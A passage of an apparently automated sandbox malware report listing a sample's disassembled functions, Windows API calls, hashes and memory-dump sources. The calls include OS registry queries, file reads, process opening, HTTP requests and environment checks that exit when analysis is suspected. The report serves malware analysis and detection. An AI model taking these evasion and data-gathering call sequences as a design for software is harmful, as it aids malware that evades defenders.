                                  • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                  • Instruction ID: 87d877fa59fbaa6c8ea20321ce2aa53ff228c707c175ba53dda5d6953ad90a4f
                                  • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                  • Instruction Fuzzy Hash: 49012CB9A80209BBEB10DBE0DD49FADB7B9EB48701F005164BA0596284D6749900CF51
                                  Function 00417690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004176A4
                                  • HeapAlloc.KERNEL32(00000000), ref: 004176AB
                                  • RegOpenKeyExA.ADVAPI32(80000002,00885FA0,00000000,00020119,00000000), ref: 004176DD
                                  • RegQueryValueExA.ADVAPI32(00000000,0088ABB8,00000000,00000000,?,000000FF), ref: 004176FE
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00417708
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocCloseOpenProcessQueryValue
                                  • String ID: Windows 11
                                  • API String ID: 3466090806-2517555085
                                  • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                  • Instruction ID: 0438ef7ee9a5fbee92b010be2e89678c99e6505f2a73f727aa840deaa157456b
                                  • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                  • Instruction Fuzzy Hash: E0018FBDA80204BFE700DBE0DD49FAEB7BDEB09700F004055FA05D7290E674A9408B55
                                  Function 00417720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417734
                                  • HeapAlloc.KERNEL32(00000000), ref: 0041773B
                                  • RegOpenKeyExA.ADVAPI32(80000002,00885FA0,00000000,00020119,004176B9), ref: 0041775B
                                  • RegQueryValueExA.ADVAPI32(004176B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0041777A
                                  • RegCloseKey.ADVAPI32(004176B9), ref: 00417784
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocCloseOpenProcessQueryValue
                                  • String ID: CurrentBuildNumber
                                  • API String ID: 3466090806-1022791448
                                  • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                  • Instruction ID: 98fe8272c38af2577472084bebc30d651685970d5c5bfe2bd2220dad028592af
                                  • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                  • Instruction Fuzzy Hash: 0F0144BDA80308BFE710DFE0DC49FAEB7B9EB44704F104159FA05A7281DA7455408F51
                                  Function 004192E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateFileA.KERNEL32(:A,80000000,00000003,00000000,00000003,00000080,00000000,?,00413AEE,?), ref: 004192FC
                                  • GetFileSizeEx.KERNEL32(000000FF,:A), ref: 00419319
                                  • CloseHandle.KERNEL32(000000FF), ref: 00419327
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseCreateHandleSize
                                  • String ID: :A$:A
                                  • API String ID: 1378416451-1974578005
                                  • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                  • Instruction ID: 8914ec7bfe49e7fff428ea2f0c8e17c8fee3bdc60d16e88834f62bd89b6794de
                                  • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                  • Instruction Fuzzy Hash: 14F03C39E80208BBDB20DFF0DC59BDE77BAAB48710F108254FA61A72C0D6789A418B45
                                  Function 022E7537 Relevance: 9.1, APIs: 6, Instructions: 149registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 022E75A1
                                  • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 022E7618
                                  • StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 022E7674
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 022E76B9
                                  • HeapFree.KERNEL32(00000000), ref: 022E76C0
                                    • Part of subcall function 022E94A7: vsprintf_s.MSVCRT ref: 022E94C2
                                  • task.LIBCPMTD ref: 022E77BC
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$EnumFreeOpenProcessValuetaskvsprintf_s
                                  • String ID:
                                  • API String ID: 700816787-0
                                  • Opcode ID: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                                  • Instruction ID: 016dc93e85b805816bedacee705b5acf0006b569dc39df1aa97c86f7f1d92936
                                  • Opcode Fuzzy Hash: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                                  • Instruction Fuzzy Hash: 26613DB591026C9BDF24DB90CC41FE9B7B9BF44300F4081E9E68AA6144EBB05BC5DF91
                                  Function 022F5527 Relevance: 9.1, APIs: 6, Instructions: 138stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 022FAA07: lstrcpy.KERNEL32(?,00000000), ref: 022FAA4D
                                    • Part of subcall function 022E64E7: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 022E6548
                                    • Part of subcall function 022E64E7: StrCmpCA.SHLWAPI(?,0064A480), ref: 022E656A
                                    • Part of subcall function 022E64E7: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 022E659C
                                    • Part of subcall function 022E64E7: HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 022E65EC
                                    • Part of subcall function 022E64E7: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 022E6626
                                    • Part of subcall function 022E64E7: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 022E6638
                                    • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                  • StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 022F557F
                                  • lstrlen.KERNEL32(00000000), ref: 022F5596
                                    • Part of subcall function 022F9097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 022F90B9
                                  • StrStrA.SHLWAPI(00000000,00000000), ref: 022F55CB
                                  • lstrlen.KERNEL32(00000000), ref: 022F55EA
                                  • strtok.MSVCRT(00000000,?), ref: 022F5605
                                  • lstrlen.KERNEL32(00000000), ref: 022F5615
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                  • String ID:
                                  • API String ID: 3532888709-0
                                  • Opcode ID: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                                  • Instruction ID: 2e94e57ee7bd006ace08b5aa9786c55100ad72b271a6cd4957ed0b52d2c8f3bc
                                  • Opcode Fuzzy Hash: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                                  • Instruction Fuzzy Hash: 8651BB715203489BCB68EFE4DEA5AEDB776AF10301F904038EA0A66694DB346B49CF51
                                  Function 022F7337 Relevance: 9.1, APIs: 6, Instructions: 136COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 022F7345
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                  • OpenProcess.KERNEL32(001FFFFF,00000000,022F7574,004205BD), ref: 022F7383
                                  • memset.MSVCRT ref: 022F73D1
                                  • ??_V@YAXPAX@Z.MSVCRT(?), ref: 022F7525
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: OpenProcesslstrcpymemset
                                  • String ID:
                                  • API String ID: 224852652-0
                                  • Opcode ID: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                                  • Instruction ID: ec03d3f3d8c1cbde2bd9eca07fd8be41c342852b5703ea6fe1a482844a79d522
                                  • Opcode Fuzzy Hash: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                                  • Instruction Fuzzy Hash: 56518FB1C203199BDBA4DBE4DC84BEDF775AF44305F5040B8E609A7284DB746A88CF58
                                  Function 022F4317 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 022F433C
                                  • RegOpenKeyExA.ADVAPI32(80000001,0064A4D8,00000000,00020119,?), ref: 022F435B
                                  • RegQueryValueExA.ADVAPI32(?,0064A0D4,00000000,00000000,00000000,000000FF), ref: 022F437F
                                  • RegCloseKey.ADVAPI32(?), ref: 022F4389
                                  • lstrcat.KERNEL32(?,00000000), ref: 022F43AE
                                  • lstrcat.KERNEL32(?,0064A168), ref: 022F43C2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$CloseOpenQueryValuememset
                                  • String ID:
                                  • API String ID: 2623679115-0
                                  • Opcode ID: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                                  • Instruction ID: 416fecc4e2f557640287aa9c71e1c30ad43fa06f8c2e7e63c33b1aa53bcb34a7
                                  • Opcode Fuzzy Hash: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                                  • Instruction Fuzzy Hash: E041C7B69502087BDB14FBE0DC46FEF733AAB49700F004558A71957184EAB55A98CFE1
                                  Function 004140B0 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 004140D5
                                  • RegOpenKeyExA.ADVAPI32(80000001,0088B0A8,00000000,00020119,?), ref: 004140F4
                                  • RegQueryValueExA.ADVAPI32(?,0088BE50,00000000,00000000,00000000,000000FF), ref: 00414118
                                  • RegCloseKey.ADVAPI32(?), ref: 00414122
                                  • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414147
                                  • lstrcatA.KERNEL32(?,0088BDA8), ref: 0041415B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$CloseOpenQueryValuememset
                                  • String ID:
                                  • API String ID: 2623679115-0
                                  • Opcode ID: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                                  • Instruction ID: 42b23dca6cf9d61fcd17bb79f48ce0988bb9dd5848c5c15250a36de7d2584b3c
                                  • Opcode Fuzzy Hash: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                                  • Instruction Fuzzy Hash: 6941B6BAD402087BDB14EBE0DC46FEE777DAB88304F00455DB61A571C1EA795B888B92
                                  Function 00413560 Relevance: 9.1, APIs: 6, Instructions: 122stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • strtok_s.MSVCRT ref: 00413588
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                  • strtok_s.MSVCRT ref: 004136D1
                                    • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00883680,?,0042110C,?,00000000), ref: 0041A82B
                                    • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpystrtok_s$lstrlen
                                  • String ID:
                                  • API String ID: 3184129880-0
                                  • Opcode ID: dbbd9b12a914175184af0c3d7732a4fa56912c4259726abfbaa9763b1c27244b
                                  • Instruction ID: 1d6e97e2126c91d023f3aa3275f065f217875d3b7f18f669bcfd2096c4fc0c60
                                  • Opcode Fuzzy Hash: dbbd9b12a914175184af0c3d7732a4fa56912c4259726abfbaa9763b1c27244b
                                  • Instruction Fuzzy Hash: C34191B1D00108EFCB04EFE5D945AEEB7B4BF44308F00801EE41676291DB789A56CFAA
                                  Function 0041B38C Relevance: 9.1, APIs: 6, Instructions: 98COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • __lock.LIBCMT ref: 0041B39A
                                    • Part of subcall function 0041AFAC: __mtinitlocknum.LIBCMT ref: 0041AFC2
                                    • Part of subcall function 0041AFAC: __amsg_exit.LIBCMT ref: 0041AFCE
                                    • Part of subcall function 0041AFAC: EnterCriticalSection.KERNEL32(?,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041AFD6
                                  • DecodePointer.KERNEL32(0042A138,00000020,0041B4DD,?,00000001,00000000,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E), ref: 0041B3D6
                                  • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B3E7
                                    • Part of subcall function 0041BE35: EncodePointer.KERNEL32(00000000,0041C063,004495B8,00000314,00000000,?,?,?,?,?,0041B707,004495B8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041BE37
                                  • DecodePointer.KERNEL32(-00000004,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B40D
                                  • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B420
                                  • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B42A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                  • String ID:
                                  • API String ID: 2005412495-0
                                  • Opcode ID: 430bce5bb079d1d45eb37588782b3a2619b50b5e0611126e08e4fa3877c2895d
                                  • Instruction ID: fa90de3286715eaa6817e9c79d9293911763414a7997c4368e9d4f64dee3ff46
                                  • Opcode Fuzzy Hash: 430bce5bb079d1d45eb37588782b3a2619b50b5e0611126e08e4fa3877c2895d
                                  • Instruction Fuzzy Hash: A5314874900309DFDF109FA9C9452DEBAF1FF48314F10802BE454A6262CBB94891DFAE
                                  Function 022F6C57 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 022F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 022F9B08
                                    • Part of subcall function 022F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 022F9B21
                                    • Part of subcall function 022F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 022F9B39
                                    • Part of subcall function 022F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 022F9B51
                                    • Part of subcall function 022F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 022F9B6A
                                    • Part of subcall function 022F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 022F9B82
                                    • Part of subcall function 022F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A4D4), ref: 022F9B9A
                                    • Part of subcall function 022F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 022F9BB3
                                    • Part of subcall function 022F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 022F9BCB
                                    • Part of subcall function 022F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 022F9BE3
                                    • Part of subcall function 022F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 022F9BFC
                                    • Part of subcall function 022F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 022F9C14
                                    • Part of subcall function 022F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 022F9C2C
                                    • Part of subcall function 022F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 022F9C45
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                    • Part of subcall function 022E1437: ExitProcess.KERNEL32 ref: 022E1478
                                    • Part of subcall function 022E13C7: GetSystemInfo.KERNEL32(?), ref: 022E13D1
                                    • Part of subcall function 022E13C7: ExitProcess.KERNEL32 ref: 022E13E5
                                    • Part of subcall function 022E1377: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 022E1392
                                    • Part of subcall function 022E1377: VirtualAllocExNuma.KERNEL32(00000000), ref: 022E1399
                                    • Part of subcall function 022E1377: ExitProcess.KERNEL32 ref: 022E13AA
                                    • Part of subcall function 022E1487: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 022E14A5
                                    • Part of subcall function 022E1487: __aulldiv.LIBCMT ref: 022E14BF
                                    • Part of subcall function 022E1487: __aulldiv.LIBCMT ref: 022E14CD
                                    • Part of subcall function 022E1487: ExitProcess.KERNEL32 ref: 022E14FB
                                    • Part of subcall function 022F69D7: GetUserDefaultLangID.KERNEL32 ref: 022F69DB
                                    • Part of subcall function 022E13F7: ExitProcess.KERNEL32 ref: 022E142D
                                    • Part of subcall function 022F7AB7: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,022E141E), ref: 022F7AE7
                                    • Part of subcall function 022F7AB7: RtlAllocateHeap.NTDLL(00000000), ref: 022F7AEE
                                    • Part of subcall function 022F7AB7: GetUserNameA.ADVAPI32(00000104,00000104), ref: 022F7B06
                                    • Part of subcall function 022F7B47: GetProcessHeap.KERNEL32(00000000,00000104), ref: 022F7B77
                                    • Part of subcall function 022F7B47: RtlAllocateHeap.NTDLL(00000000), ref: 022F7B7E
                                    • Part of subcall function 022F7B47: GetComputerNameA.KERNEL32(?,00000104), ref: 022F7B96
                                    • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                    • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                    • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                    • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 022F6D31
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 022F6D4F
                                  • CloseHandle.KERNEL32(00000000), ref: 022F6D60
                                  • Sleep.KERNEL32(00001770), ref: 022F6D6B
                                  • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 022F6D81
                                  • ExitProcess.KERNEL32 ref: 022F6D89
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                  • String ID:
                                  • API String ID: 2525456742-0
                                  • Opcode ID: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                                  • Instruction ID: 417c4337a14bd03aa24b9d96b69d9c7b9ca1aa6d988d8f6a3b71d8e46c256cfb
                                  • Opcode Fuzzy Hash: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                                  • Instruction Fuzzy Hash: 8A312876A60308AADB84FBF0DC55BFDF37AAF14300F504538A616A6298EF745A44CE61
                                  Function 022E9C27 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 022E9C53
                                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 022E9C78
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 022E9C98
                                  • ReadFile.KERNEL32(000000FF,?,00000000,022E16F6,00000000), ref: 022E9CC1
                                  • LocalFree.KERNEL32(022E16F6), ref: 022E9CF7
                                  • CloseHandle.KERNEL32(000000FF), ref: 022E9D01
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                  • String ID:
                                  • API String ID: 2311089104-0
                                  • Opcode ID: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                                  • Instruction ID: 461739f713f6582ed5ccc2497ea68013164b4033f14286a6be278cc584591a67
                                  • Opcode Fuzzy Hash: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                                  • Instruction Fuzzy Hash: 5F311878A10209EFDF14DFD4C884BAE77F5FB49314F108159E916A7294C774AA81CFA1
                                  Function 004099C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                  • ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                  • LocalFree.KERNEL32(004102E7), ref: 00409A90
                                  • CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                  • String ID:
                                  • API String ID: 2311089104-0
                                  • Opcode ID: 41a9ac40214c004258481c146167ca84ac173594ef3507387ebcdc5aa67caad4
                                  • Instruction ID: ed52a4b53b9c0591db71eabf51b59360b39b3b260bb7ca760b64e801f0f9a50e
                                  • Opcode Fuzzy Hash: 41a9ac40214c004258481c146167ca84ac173594ef3507387ebcdc5aa67caad4
